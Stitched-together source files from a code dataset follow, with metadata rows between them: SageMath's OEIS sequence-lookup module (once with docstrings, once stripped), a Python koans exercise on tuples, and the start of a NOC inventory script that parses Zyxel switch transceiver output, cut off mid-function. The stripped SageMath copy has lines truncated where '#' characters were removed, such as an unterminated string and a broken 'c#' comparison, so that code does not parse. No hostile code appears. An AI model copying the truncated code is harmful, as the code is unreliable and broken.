A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.comments()[:3] # optional -- internet
0: Also sometimes called Lamé's sequence.
1: F(n+2) = number of binary sequences of length n that have no consecutive 0's.
2: F(n+2) = number of subsets of {1,2,...,n} that contain no consecutive integers.
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.comments()
0: 42 is the product of the first 4 prime numbers, except 5 and perhaps 1.
1: Apart from that, i have no comment.
"""
return FancyTuple(self._field('C'))
def url(self):
r"""
Return the URL of the page associated to the sequence ``self``.
OUTPUT:
- string.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.url() # optional -- internet
'https://oeis.org/A000045'
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.url()
'https://oeis.org/A999999'
"""
return oeis_url + self.id()
def browse(self):
r"""
Open the OEIS web page associated to the sequence ``self`` in a browser.
EXAMPLES::
sage: f = oeis(45) ; f # optional -- internet webbrowser
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
sage: f.browse() # optional -- internet webbrowser
TESTS::
sage: s = oeis._imaginary_sequence() # optional -- webbrowser
sage: s.browse() # optional -- webbrowser
"""
import webbrowser
webbrowser.open(self.url())
def show(self):
r"""
Display most available informations about the sequence ``self``.
EXAMPLES::
sage: s = oeis(12345) # optional -- internet
sage: s.show() # optional -- internet
ID
A012345
<BLANKLINE>
NAME
Coefficients in the expansion sinh(arcsin(x)*arcsin(x)) = 2*x^2/2!+8*x^4/4!+248*x^6/6!+11328*x^8/8!+...
<BLANKLINE>
FIRST TERMS
(2, 8, 248, 11328, 849312, 94857600, 14819214720, 3091936512000, 831657655349760, 280473756197529600, 115967597965430077440, 57712257892456911912960, 34039765801079493369569280)
<BLANKLINE>
LINKS
0: https://oeis.org/A012345/b012345.txt
<BLANKLINE>
FORMULAS
...
OFFSETS
(0, 1)
<BLANKLINE>
URL
https://oeis.org/A012345
<BLANKLINE>
AUTHOR
Patrick Demichel (patrick.demichel(AT)hp.com)
<BLANKLINE>
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.show()
ID
A999999
<BLANKLINE>
NAME
The characteristic sequence of 42 plus ...
FIRST TERMS
(1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...
<BLANKLINE>
COMMENTS
0: 42 is the product of the first 4 prime numbers, except ...
1: Apart from that, i have no comment.
...
"""
for s in ['id', 'name', 'first_terms', 'comments', 'references',
'links', 'formulas', 'examples', 'cross_references',
'programs', 'keywords', 'offsets', 'url', 'old_IDs',
'author', 'extensions_or_errors']:
if embedded() and s == 'links':
print(re.sub('_', ' ', s).upper())
getattr(self, s)()
print('\n')
else:
result = getattr(self, s)()
if result != '' and result != ('',) and result != ():
print(re.sub('_', ' ', s).upper())
print(str(result) + '\n')
def programs(self, language='all', preparsing=True, keep_comments=False):
r"""
Return programs for the sequence ``self`` in the given ``language``.
INPUT:
- ``language`` -- string (default: 'all'), the chosen language.
Possible values are 'all' for the full list, or
any language name, for example 'sage', 'maple', 'mathematica', etc.
Some further optional input is specific to sage code treatment:
- ``preparsing`` -- boolean (default: ``True``) whether to preparse
sage code
- ``keep_comments`` -- boolean (default: ``False``) whether to keep
comments in sage code
OUTPUT:
If ``language`` is ``'all'``, this returns a sorted list of pairs
(language, code), where every language can appear several times.
Otherwise, this returns a list of programs in the ``language``,
each program being a tuple of strings (with fancy formatting).
EXAMPLES::
sage: ee = oeis('A001113') ; ee # optional -- internet
A001113: Decimal expansion of e.
sage: ee.programs('pari')[0] # optional -- internet
0: default(realprecision, 50080); x=exp(1); for (n=1, 50000, d=floor(x); x=(x-d)*10; write("b001113.txt", n, " ", d)); \\ _Harry J. Smith_, Apr 15 2009
sage: G = oeis.find_by_id('A27642') # optional -- internet
sage: G.programs('all') # optional -- internet
[('haskell', ...),
('magma', ...),
...
('python', ...),
('sage', ...)]
TESTS::
sage: s = oeis._imaginary_sequence()
sage: s.programs()
[('maple', ...),
('mathematica', ...),
('python',
0: def A999999(n):
1: assert(isinstance(n, (int, Integer))), "n must be an integer."
2: if n < 38:
3: raise ValueError("The value %s is not accepted." %str(n))
4: elif n == 42:
5: return 2
6: else:
7: return 1)]
sage: s.programs('maple')[0]
0: Do not even try, Maple is not able to produce such a sequence.
sage: s.programs('mathematica')[0]
0: Mathematica neither.
"""
language = language.lower()
if language == "maple":
return [FancyTuple(self._field('p'))]
elif language == "mathematica":
return [FancyTuple(self._field('t'))]
if language == 'sagemath':
language = 'sage'
if language == 'all':
table = [('maple', FancyTuple(self._field('p'))),
('mathematica', FancyTuple(self._field('t')))]
else:
table = []
def is_starting_line(line):
"""
Help to split the big OEIS code block into blocks by language.
This returns ``None`` if ``line`` is not a starting line.
"""
if not line.startswith('('):
return None
if ')' not in line:
return None
end = line.index(')')
language = line[1:end].lower() # to handle (Sage) versus (sage)
if '(' in language:
return None
if language == 'sagemath':
language = 'sage'
if language == 'c#' or language == 'c++':
language = 'c'
if language.replace(' ', '').isalnum() or language.startswith('scheme'):
# to cope with many wrong (Scheme xxx) separators in the OEIS
return (language, end)
return None
def filter_sage(lines):
"""
Remove comments and preparse if required, only for sage code.
This is an iterator.
"""
for line in lines:
if keep_comments or not line.strip().startswith('#'):
if preparsing:
yield preparse(line)
else:
yield line
def flush_to_table(language, code_lines):
"""
Put a list of code lines into the appropriate box of the table.
With special treatment for sage code blocks.
"""
if language == 'sage':
table.append((language, FancyTuple(filter_sage(code_lines))))
elif language is not None:
table.append((language, FancyTuple(code_lines)))
programs = FancyTuple(self._field('o'))
code_lines = []
old_language = None
for line in programs:
new_language = is_starting_line(line)
if new_language is not None:
# flush the stock of code lines if any
flush_to_table(old_language, code_lines)
# start new stock of code lines
old_language, end = new_language
rest = line[end + 1:].strip()
code_lines = [rest] if rest else []
else:
code_lines.append(line)
flush_to_table(old_language, code_lines)
if language == 'all':
return sorted(table)
return sorted(prog for la, prog in table if la == language)
def test_compile_sage_code(self):
"""
Try to compile the extracted sage code, if there is any.
If there are several sage code fields, they are all considered.
Dead sequences are considered to compile correctly by default.
This returns ``True`` if the code compiles, and raises an error
otherwise.
EXAMPLES:
One correct sequence::
sage: s = oeis.find_by_id('A027642') # optional -- internet
sage: s.test_compile_sage_code() # optional -- internet
True
One dead sequence::
sage: s = oeis.find_by_id('A000154') # optional -- internet
sage: s.test_compile_sage_code() # optional -- internet
doctest:warning
...
RuntimeWarning: This sequence is dead: ...
True
"""
if self.is_dead():
return True
filt = self.programs(language='sage')
if filt:
for v in filt:
tp = tmp_filename(ext='.sage')
_ = compile('\n'.join(v), tp, 'exec')
return True
class FancyTuple(tuple):
r"""
This class inherits from ``tuple``, it allows to nicely print tuples whose
elements have a one line representation.
EXAMPLES::
sage: from sage.databases.oeis import FancyTuple
sage: t = FancyTuple(['zero', 'one', 'two', 'three', 4]) ; t
0: zero
1: one
2: two
3: three
4: 4
sage: t[2]
'two'
"""
def __repr__(self):
r"""
Print the tuple with one value per line, where each line
begins with the index of the value in ``self``.
EXAMPLES::
sage: from sage.databases.oeis import FancyTuple
sage: t = FancyTuple(['zero', 'one', 'two', 'three', 4]) ; t
0: zero
1: one
2: two
3: three
4: 4
sage: t = FancyTuple(['Français', 'Español', '中文']) ; t
0: Français
1: Español
2: 中文
"""
length = len(str(len(self) - 1))
return '\n'.join('{0:>{1}}: {2}'.format(i, length, item) for i, item in enumerate(self))
def __getslice__(self, i, j):
r"""
The slice of a FancyTuple remains a FancyTuple.
EXAMPLES::
sage: from sage.databases.oeis import FancyTuple
sage: t = FancyTuple(['zero', 'one', 'two', 'three', 4])
sage: t[-2:]
0: three
1: 4
TESTS::
sage: t = ('é', 'è', 'à', 'ç')
sage: FancyTuple(t)[2:4]
0: à
1: ç
"""
return self.__getitem__(slice(i, j))
def __getitem__(self, x):
r"""
If ``x`` is a slice return the corresponding sub FancyTuple,
else return the `̀`x``-th item of ``self``.
TESTS::
sage: from sage.databases.oeis import FancyTuple
sage: t = ('é', 'è', 'à', 'ç')
sage: ft = FancyTuple(t)
sage: ft[0] == 'é'
True
sage: ft[-1] == 'ç'
True
Check that :trac:`26997` is fixed::
sage: FancyTuple([[1,2,3],(4,5,6)])
0: [1, 2, 3]
1: (4, 5, 6)
"""
res = tuple.__getitem__(self, x)
if isinstance(x, slice):
res = FancyTuple(res)
return res
oeis = OEIS()
| 34.898482 | 189 | 0.516652 |
from __future__ import print_function
from urllib.request import urlopen
from urllib.parse import urlencode
from sage.structure.sage_object import SageObject
from sage.structure.unique_representation import UniqueRepresentation
from sage.cpython.string import bytes_to_str
from sage.rings.integer import Integer
from sage.misc.verbose import verbose
from sage.misc.cachefunc import cached_method
from sage.misc.flatten import flatten
from sage.misc.temporary_file import tmp_filename
from sage.misc.unknown import Unknown
from sage.misc.misc import embedded
from sage.misc.html import HtmlFragment
from sage.repl.preparse import preparse
from collections import defaultdict
import re
oeis_url = 'https://oeis.org/'
def _fetch(url):
try:
verbose("Fetching URL %s ..." % url, caller_name='OEIS')
f = urlopen(url)
result = f.read()
f.close()
return bytes_to_str(result)
except IOError as msg:
raise IOError("%s\nError fetching %s." % (msg, url))
def _urls(html_string):
urls = []
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
def handle_starttag(self, tag, attrs):
if tag == 'a':
for attr in attrs:
if attr[0] == 'href':
urls.append(attr[1])
MyHTMLParser().feed(html_string)
return urls
to_tuple = lambda string: tuple(Integer(x) for x in string.split(",") if x)
class OEIS:
def __call__(self, query, max_results=3, first_result=0):
if isinstance(query, str):
if re.match('^A[0-9]{6}$', query):
return self.find_by_id(query)
else:
return self.find_by_description(query, max_results, first_result)
elif isinstance(query, (int, Integer)):
return self.find_by_id(query)
elif isinstance(query, (list, tuple)):
return self.find_by_subsequence(query, max_results, first_result)
def __repr__(self):
return "The On-Line Encyclopedia of Integer Sequences (%s)" % oeis_url
def find_by_id(self, ident, fetch=False):
sequence = OEISSequence(ident=ident)
if fetch:
sequence.online_update()
return sequence
def find_by_entry(self, entry):
ident = entry[3:10]
sequence = OEISSequence(ident=ident)
sequence._raw = entry
return sequence
def find_by_description(self, description, max_results=3, first_result=0):
options = {'q': description,
'n': str(max_results),
'fmt': 'text',
'start': str(first_result)}
url = oeis_url + "search?" + urlencode(options)
sequence_list = _fetch(url).split('\n\n')[2:-1]
return FancyTuple([self.find_by_entry(entry=_) for _ in sequence_list])
def find_by_subsequence(self, subsequence, max_results=3, first_result=0):
subsequence = str(subsequence)[1:-1]
return self.find_by_description(subsequence, max_results, first_result)
def browse(self):
import webbrowser
webbrowser.open(oeis_url)
def _imaginary_entry(self, ident='A999999', keywords=''):
return ('%I ' + ident + ' M9999 N9999\n'
'%S ' + ident + ' 1,1,1,1,2,1,1,1,\n'
'%T ' + ident + ' 1,1,1,1,1,1,1,1,1,\n'
'%U ' + ident + ' 1,1,1,1,1,1,1,1,1\n'
'%N ' + ident + ' The characteristic sequence of 42 plus one, starting from 38.\n'
'%D ' + ident + ' Lewis Carroll, Alice\'s Adventures in Wonderland.\n'
'%D ' + ident + ' Lewis Carroll, The Hunting of the Snark.\n'
'%D ' + ident + ' Deep Thought, The Answer to the Ultimate Question of Life, The Universe, and Everything.\n'
'%H ' + ident + ' Wikipedia, <a href="https://en.wikipedia.org/wiki/42_(number)">42 (number)</a>\n'
'%H ' + ident + ' See. also <a href="https://trac.sagemath.org/sage_trac/ticket/42">trac ticket
'%H ' + ident + ' Do not confuse with the sequence <a href="/A000042">A000042</a> or the sequence <a href="/A000024">A000024</a>\n'
'%H ' + ident + ' The string http://42.com is not a link.\n'
'%F ' + ident + ' For n big enough, s(n+1) - s(n) = 0.\n'
'%Y ' + ident + ' Related sequences are A000042 and its friend A000024.\n'
'%A ' + ident + ' Anonymous.\n'
'%O ' + ident + ' 38,4\n'
'%E ' + ident + ' This sequence does not contain errors.\n'
'%e ' + ident + ' s(42) + s(43) = 0.\n'
'%p ' + ident + ' Do not even try, Maple is not able to produce such a sequence.\n'
'%t ' + ident + ' Mathematica neither.\n'
'%o ' + ident + ' (Python)\n'
'%o ' + ident + ' def ' + ident + '(n):\n'
'%o ' + ident + ' assert(isinstance(n, (int, Integer))), "n must be an integer."\n'
'%o ' + ident + ' if n < 38:\n'
'%o ' + ident + ' raise ValueError("The value %s is not accepted." %str(n))\n'
'%o ' + ident + ' elif n == 42:\n'
'%o ' + ident + ' return 2\n'
'%o ' + ident + ' else:\n'
'%o ' + ident + ' return 1\n'
'%K ' + ident + ' ' + keywords + '\n'
'%C ' + ident + ' 42 is the product of the first 4 prime numbers, except 5 and perhaps 1.\n'
'%C ' + ident + ' Apart from that, i have no comment.')
def _imaginary_sequence(self, ident='A999999', keywords='sign,easy'):
return self.find_by_entry(entry=self._imaginary_entry(ident=ident, keywords=keywords))
class OEISSequence(SageObject, UniqueRepresentation):
@staticmethod
def __classcall__(cls, ident):
if not isinstance(ident, str):
ident = str(ident)
ident = 'A000000'[:-len(ident)] + ident
return super(OEISSequence, cls).__classcall__(cls, ident)
def __init__(self, ident):
self._id = ident
def online_update(self):
options = {'q': self._id, 'n': '1', 'fmt': 'text'}
url = oeis_url + "search?" + urlencode(options)
self._raw = _fetch(url).split('\n\n')[2]
try:
del self._fields
except AttributeError:
pass
def _field(self, key):
try:
return self._fields[key]
except AttributeError:
fields = defaultdict(list)
for line in self.raw_entry().splitlines():
fields[line[1]].append(line[11:])
self._fields = fields
self.is_dead(warn_only=True)
return self._fields[key]
def id(self, format='A'):
if format == 'A':
return self._id
elif format == 'int':
return int(self._id[1:].lstrip("0"))
def __hash__(self):
return self.id(format='int')
def raw_entry(self):
try:
return self._raw
except AttributeError:
self.online_update()
return self._raw
def name(self):
return self._field('N')[0]
def old_IDs(self):
return tuple(self._field('I')[0].split(' '))
def offsets(self):
return to_tuple(self._field('O')[0])
def author(self):
return self._field('A')[0]
def keywords(self):
return tuple(self._field('K')[0].split(','))
def natural_object(self):
if 'cofr' in self.keywords() and 'frac' not in self.keywords():
from sage.rings.continued_fraction import continued_fraction
return continued_fraction(self.first_terms())
elif 'cons' in self.keywords():
offset = self.offsets()[0]
terms = self.first_terms() + tuple([0] * abs(offset))
from sage.rings.real_lazy import RealLazyField
return RealLazyField()('0' + ''.join(map(str, terms[:offset])) + '.' + ''.join(map(str, terms[offset:])))
elif 'nonn' in self.keywords():
from sage.structure.sequence import Sequence
from sage.rings.semirings.non_negative_integer_semiring import NN
return Sequence(self.first_terms(), NN)
else:
from sage.structure.sequence import Sequence
from sage.rings.integer_ring import ZZ
return Sequence(self.first_terms(), ZZ)
def is_dead(self, warn_only=False):
if warn_only:
if 'dead' in self.keywords():
from warnings import warn
warn('This sequence is dead: "{}: {}"'.format(self.id(), self.name()), RuntimeWarning)
else:
return 'dead' in self.keywords()
def is_finite(self):
if 'finit' in self.keywords() or 'full' in self.keywords():
return True
else:
return Unknown
def is_full(self):
if 'full' in self.keywords():
return True
else:
return Unknown
@cached_method
def first_terms(self, number=None):
fields = ['S', 'T', 'U']
return to_tuple(" ".join(flatten([self._field(a) for a in fields])))[:number]
def _repr_(self):
return "%s: %s" % (self.id(), self.name())
def __call__(self, k):
offset = self.offsets()[0]
if 'cons' in self.keywords():
offset = - offset
n = k - offset
if not 0 <= n < len(self.first_terms()):
raise ValueError("Sequence %s is not defined (or known) for index %s" % (self.id(), k))
return self.first_terms()[n]
def __getitem__(self, i):
return self.first_terms()[i]
def __iter__(self):
for x in self.first_terms():
yield x
if not self.is_full() is True:
raise LookupError("Future values not provided by OEIS.")
def references(self):
return FancyTuple(self._field('D'))
def links(self, browse=None, format='guess'):
url_absolute = lambda s: re.sub(r'\"\/', '\"' + oeis_url, s)
if browse is None:
if format == 'guess':
if embedded():
return self.links(format='html')
else:
return self.links(format='url')
elif format == 'raw':
return FancyTuple(self._field('H'))
elif format == 'html':
return HtmlFragment(FancyTuple([url_absolute(_) for _ in self._field('H')]))
elif format == 'url':
url_list = flatten([_urls(url_absolute(string)) for string in self._field('H')])
return FancyTuple(url_list)
else:
import webbrowser
url_list = flatten([_urls(url_absolute(string)) for string in self._field('H')])
if isinstance(browse, (int, Integer)):
webbrowser.open(url_list[browse])
elif isinstance(browse, (list, tuple)):
for url_number in browse:
webbrowser.open(url_list[url_number])
elif browse == 'all':
for url in url_list:
webbrowser.open(url)
def formulas(self):
return FancyTuple(self._field('F'))
def cross_references(self, fetch=False):
ref_list = re.findall('A[0-9]{6}', " ".join(self._field('Y')))
if fetch:
return FancyTuple([oeis.find_by_id(_) for _ in ref_list])
else:
return tuple(ref_list)
def extensions_or_errors(self):
return FancyTuple(self._field('E'))
def examples(self):
return FancyTuple(self._field('e'))
def comments(self):
return FancyTuple(self._field('C'))
def url(self):
return oeis_url + self.id()
def browse(self):
import webbrowser
webbrowser.open(self.url())
def show(self):
for s in ['id', 'name', 'first_terms', 'comments', 'references',
'links', 'formulas', 'examples', 'cross_references',
'programs', 'keywords', 'offsets', 'url', 'old_IDs',
'author', 'extensions_or_errors']:
if embedded() and s == 'links':
print(re.sub('_', ' ', s).upper())
getattr(self, s)()
print('\n')
else:
result = getattr(self, s)()
if result != '' and result != ('',) and result != ():
print(re.sub('_', ' ', s).upper())
print(str(result) + '\n')
def programs(self, language='all', preparsing=True, keep_comments=False):
language = language.lower()
if language == "maple":
return [FancyTuple(self._field('p'))]
elif language == "mathematica":
return [FancyTuple(self._field('t'))]
if language == 'sagemath':
language = 'sage'
if language == 'all':
table = [('maple', FancyTuple(self._field('p'))),
('mathematica', FancyTuple(self._field('t')))]
else:
table = []
def is_starting_line(line):
if not line.startswith('('):
return None
if ')' not in line:
return None
end = line.index(')')
language = line[1:end].lower() # to handle (Sage) versus (sage)
if '(' in language:
return None
if language == 'sagemath':
language = 'sage'
if language == 'c
language = 'c'
if language.replace(' ', '').isalnum() or language.startswith('scheme'):
# to cope with many wrong (Scheme xxx) separators in the OEIS
return (language, end)
return None
def filter_sage(lines):
for line in lines:
if keep_comments or not line.strip().startswith('
if preparsing:
yield preparse(line)
else:
yield line
def flush_to_table(language, code_lines):
if language == 'sage':
table.append((language, FancyTuple(filter_sage(code_lines))))
elif language is not None:
table.append((language, FancyTuple(code_lines)))
programs = FancyTuple(self._field('o'))
code_lines = []
old_language = None
for line in programs:
new_language = is_starting_line(line)
if new_language is not None:
# flush the stock of code lines if any
flush_to_table(old_language, code_lines)
# start new stock of code lines
old_language, end = new_language
rest = line[end + 1:].strip()
code_lines = [rest] if rest else []
else:
code_lines.append(line)
flush_to_table(old_language, code_lines)
if language == 'all':
return sorted(table)
return sorted(prog for la, prog in table if la == language)
def test_compile_sage_code(self):
if self.is_dead():
return True
filt = self.programs(language='sage')
if filt:
for v in filt:
tp = tmp_filename(ext='.sage')
_ = compile('\n'.join(v), tp, 'exec')
return True
class FancyTuple(tuple):
def __repr__(self):
length = len(str(len(self) - 1))
return '\n'.join('{0:>{1}}: {2}'.format(i, length, item) for i, item in enumerate(self))
def __getslice__(self, i, j):
return self.__getitem__(slice(i, j))
def __getitem__(self, x):
res = tuple.__getitem__(self, x)
if isinstance(x, slice):
res = FancyTuple(res)
return res
oeis = OEIS()
| true | true |
79010a6a64fb65b3c1d80fce8bbd1a73e90b8689 | 2,413 | py | Python | koans/koans/about_tuples.py | rhgraysonii/python_koan_solutions | 42ef060cfb7ab47cf539b4a4ea8f4b55063b9912 | [
"MIT"
] | null | null | null | koans/koans/about_tuples.py | rhgraysonii/python_koan_solutions | 42ef060cfb7ab47cf539b4a4ea8f4b55063b9912 | [
"MIT"
] | null | null | null | koans/koans/about_tuples.py | rhgraysonii/python_koan_solutions | 42ef060cfb7ab47cf539b4a4ea8f4b55063b9912 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutTuples(Koan):
def test_creating_a_tuple(self):
count_of_three = (1, 2, 5)
self.assertEqual(5, count_of_three[2])
def test_tuples_are_immutable_so_item_assignment_is_not_possible(self):
count_of_three = (1, 2, 5)
try:
count_of_three[2] = "three"
except TypeError as ex:
self.assertMatch('upl', ex[0])
def test_tuples_are_immutable_so_appending_is_not_possible(self):
count_of_three = (1, 2, 5)
try:
count_of_three.append("boom")
except Exception as ex:
self.assertEqual(AttributeError, type(ex))
# Note, assertMatch() uses regular expression pattern matching,
# so you don't have to copy the whole message.
self.assertMatch('object', ex[0])
# Tuples are less flexible than lists, but faster.
def test_tuples_can_only_be_changed_through_replacement(self):
count_of_three = (1, 2, 5)
list_count = list(count_of_three)
list_count.append("boom")
count_of_three = tuple(list_count)
self.assertEqual((1, 2, 5, 'boom'), count_of_three)
def test_tuples_of_one_look_peculiar(self):
self.assertEqual(type(int(1)), (1).__class__)
self.assertEqual(type((1,2)), (1,).__class__)
self.assertEqual(('Hello comma!',), ("Hello comma!", ))
def test_tuple_constructor_can_be_surprising(self):
self.assertEqual(('S', 'u', 'r', 'p', 'r', 'i', 's', 'e', '!'), tuple("Surprise!"))
def test_creating_empty_tuples(self):
self.assertEqual(tuple(), ())
self.assertEqual((), tuple()) # Sometimes less confusing
def test_tuples_can_be_embedded(self):
lat = (37, 14, 6, 'N')
lon = (115, 48, 40, 'W')
place = ('Area 51', lat, lon)
self.assertEqual(('Area 51',(37,14,6,'N'),(115,48,40,'W')), place)
def test_tuples_are_good_for_representing_records(self):
locations = [
("Illuminati HQ", (38, 52, 15.56, 'N'), (77, 3, 21.46, 'W')),
("Stargate B", (41, 10, 43.92, 'N'), (1, 49, 34.29, 'W')),
]
locations.append(
("Cthulhu", (26, 40, 1, 'N'), (70, 45, 7, 'W'))
)
self.assertEqual('Cthulhu', locations[2][0])
self.assertEqual(15.56, locations[0][1][2])
| 33.985915 | 91 | 0.590137 |
from runner.koan import *
class AboutTuples(Koan):
def test_creating_a_tuple(self):
count_of_three = (1, 2, 5)
self.assertEqual(5, count_of_three[2])
def test_tuples_are_immutable_so_item_assignment_is_not_possible(self):
count_of_three = (1, 2, 5)
try:
count_of_three[2] = "three"
except TypeError as ex:
self.assertMatch('upl', ex[0])
def test_tuples_are_immutable_so_appending_is_not_possible(self):
count_of_three = (1, 2, 5)
try:
count_of_three.append("boom")
except Exception as ex:
self.assertEqual(AttributeError, type(ex))
self.assertMatch('object', ex[0])
# Tuples are less flexible than lists, but faster.
def test_tuples_can_only_be_changed_through_replacement(self):
count_of_three = (1, 2, 5)
list_count = list(count_of_three)
list_count.append("boom")
count_of_three = tuple(list_count)
self.assertEqual((1, 2, 5, 'boom'), count_of_three)
def test_tuples_of_one_look_peculiar(self):
self.assertEqual(type(int(1)), (1).__class__)
self.assertEqual(type((1,2)), (1,).__class__)
self.assertEqual(('Hello comma!',), ("Hello comma!", ))
def test_tuple_constructor_can_be_surprising(self):
self.assertEqual(('S', 'u', 'r', 'p', 'r', 'i', 's', 'e', '!'), tuple("Surprise!"))
def test_creating_empty_tuples(self):
self.assertEqual(tuple(), ())
self.assertEqual((), tuple()) # Sometimes less confusing
def test_tuples_can_be_embedded(self):
lat = (37, 14, 6, 'N')
lon = (115, 48, 40, 'W')
place = ('Area 51', lat, lon)
self.assertEqual(('Area 51',(37,14,6,'N'),(115,48,40,'W')), place)
def test_tuples_are_good_for_representing_records(self):
locations = [
("Illuminati HQ", (38, 52, 15.56, 'N'), (77, 3, 21.46, 'W')),
("Stargate B", (41, 10, 43.92, 'N'), (1, 49, 34.29, 'W')),
]
locations.append(
("Cthulhu", (26, 40, 1, 'N'), (70, 45, 7, 'W'))
)
self.assertEqual('Cthulhu', locations[2][0])
self.assertEqual(15.56, locations[0][1][2])
| true | true |
79010bfa5dcddc4ff2329950b737d68fa1c649bb | 5,303 | py | Python | sa/profiles/Zyxel/ZyNOS/get_inventory.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | sa/profiles/Zyxel/ZyNOS/get_inventory.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | sa/profiles/Zyxel/ZyNOS/get_inventory.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Zyxel.ZyNOS.get_inventory
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
name = "Zyxel.ZyNOS.get_inventory"
interface = IGetInventory
def remove_non_ascii(self, s, sub="?"):
return "".join([i if ord(i) < 128 else sub for i in s])
def execute(self):
objects = []
v = self.scripts.get_version()
part_no = v["platform"]
vendor = v["vendor"]
p = {
"type": "CHASSIS",
"number": 1,
"vendor": vendor,
"description": part_no,
"part_no": [part_no],
"builtin": False,
}
if v.get("attributes", {}).get("Serial Number", ""):
p["serial"] = v["attributes"]["Serial Number"]
objects += [p]
objects += self.get_transceivers()
return objects
def get_transceivers(self):
def get_offset(offset):
def wrap(x):
return str(int(x) + offset)
return wrap
objects = []
if self.match_version(version__startswith="3.90"):
xcvr_n = get_offset(0)
inv = self.cli("show interface transceiver *")
rx_trans = re.compile(
r"Port\s+:\s+(?P<number>\d+)\s+\S+\n"
r"Vendor\s+:\s+(?P<vendor>\S+)\s*\n"
r"Part Number\s+:\s+(?P<part_no>\S+\s*\S*)\s*\n"
r"Serial Number\s+:\s+(?P<serial>\S+)\s*\n"
r"Revision\s+:\s+(?P<rev>\S+)?\s*\n"
r"Date Code\s+:\s+\S+\n"
r"Transceiver\s+:\s+(?P<type>\S+)",
re.MULTILINE | re.DOTALL,
)
else:
if self.match_version(platform__contains="2024"):
xcvr_n = get_offset(25)
elif self.match_version(platform__contains="2108"):
xcvr_n = get_offset(9)
else:
xcvr_n = get_offset(1)
with self.zynos_mode():
inv = self.cli("sys sw sfp disp")
rx_trans = re.compile(
r"SFP\s+:\s+(?P<number>\d+)\s*\n"
r"Vendor\s+:\s+(?P<vendor>\S+)\s*\n"
r"Part\sNumber\s+:\s+(?P<part_no>\S+\s*\S*)\s*\n"
r"Series\sNumber\s+:\s+(?P<serial>\S+)\s*\n"
r"Revision\s+:\s+(?P<rev>\S+)?\s*\n"
r"Transceiver\s+:\s+(?P<type>\S+)",
re.MULTILINE | re.DOTALL,
)
for match in rx_trans.finditer(inv):
try:
vendor = match.group("vendor").encode("utf-8")
except UnicodeDecodeError:
vendor = "NONAME"
try:
part_no = match.group("part_no").encode("utf-8").strip()
except UnicodeDecodeError:
part_no = "NoName | Transceiver | Unknown SFP"
part_no_orig = self.remove_non_ascii(match.group("part_no").strip())
if vendor in ["NONAME", "OEM", "CISCO-FINISAR", "AODevices"]:
part_no = "NoName | Transceiver | "
description = match.group("type")
if description.endswith(tuple([" EX", "-EX"])):
part_no = part_no + "1G | SFP EX"
elif description.endswith(tuple([" LH", "-LH"])):
part_no = part_no + "1G | SFP LH"
elif description.endswith(tuple([" LX", "-LX"])):
part_no = part_no + "1G | SFP LX"
elif description.endswith(tuple([" SX", "-SX"])):
part_no = part_no + "1G | SFP SX"
elif description.endswith(tuple([" T", "-T"])):
part_no = part_no + "1G | SFP T"
elif description.endswith(tuple([" TX", "-TX"])):
part_no = part_no + "1G | SFP TX"
elif description.endswith(tuple([" ZX", "-ZX"])):
part_no = part_no + "1G | SFP ZX"
elif part_no_orig.endswith(tuple(["BX-U", "BX-1"])):
part_no = part_no + "1G | SFP BXU"
elif part_no_orig.endswith("BX-D"):
part_no = part_no + "1G | SFP BXD"
else:
part_no = part_no + "Unknown SFP"
revision = self.remove_non_ascii(match.group("rev"), "") if match.group("rev") else None
o = {
"type": "XCVR",
"number": xcvr_n(match.group("number")),
"vendor": vendor,
"description": "%s (%s)" % (match.group("type"), vendor),
"part_no": [part_no.strip()],
"builtin": False,
}
if revision:
o["revision"] = revision
try:
o["serial"] = match.group("serial").encode("utf-8")
except UnicodeDecodeError:
pass
objects += [o]
return objects
| 39.87218 | 100 | 0.456723 |
import re
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
name = "Zyxel.ZyNOS.get_inventory"
interface = IGetInventory
def remove_non_ascii(self, s, sub="?"):
return "".join([i if ord(i) < 128 else sub for i in s])
def execute(self):
objects = []
v = self.scripts.get_version()
part_no = v["platform"]
vendor = v["vendor"]
p = {
"type": "CHASSIS",
"number": 1,
"vendor": vendor,
"description": part_no,
"part_no": [part_no],
"builtin": False,
}
if v.get("attributes", {}).get("Serial Number", ""):
p["serial"] = v["attributes"]["Serial Number"]
objects += [p]
objects += self.get_transceivers()
return objects
def get_transceivers(self):
def get_offset(offset):
def wrap(x):
return str(int(x) + offset)
return wrap
objects = []
if self.match_version(version__startswith="3.90"):
xcvr_n = get_offset(0)
inv = self.cli("show interface transceiver *")
rx_trans = re.compile(
r"Port\s+:\s+(?P<number>\d+)\s+\S+\n"
r"Vendor\s+:\s+(?P<vendor>\S+)\s*\n"
r"Part Number\s+:\s+(?P<part_no>\S+\s*\S*)\s*\n"
r"Serial Number\s+:\s+(?P<serial>\S+)\s*\n"
r"Revision\s+:\s+(?P<rev>\S+)?\s*\n"
r"Date Code\s+:\s+\S+\n"
r"Transceiver\s+:\s+(?P<type>\S+)",
re.MULTILINE | re.DOTALL,
)
else:
if self.match_version(platform__contains="2024"):
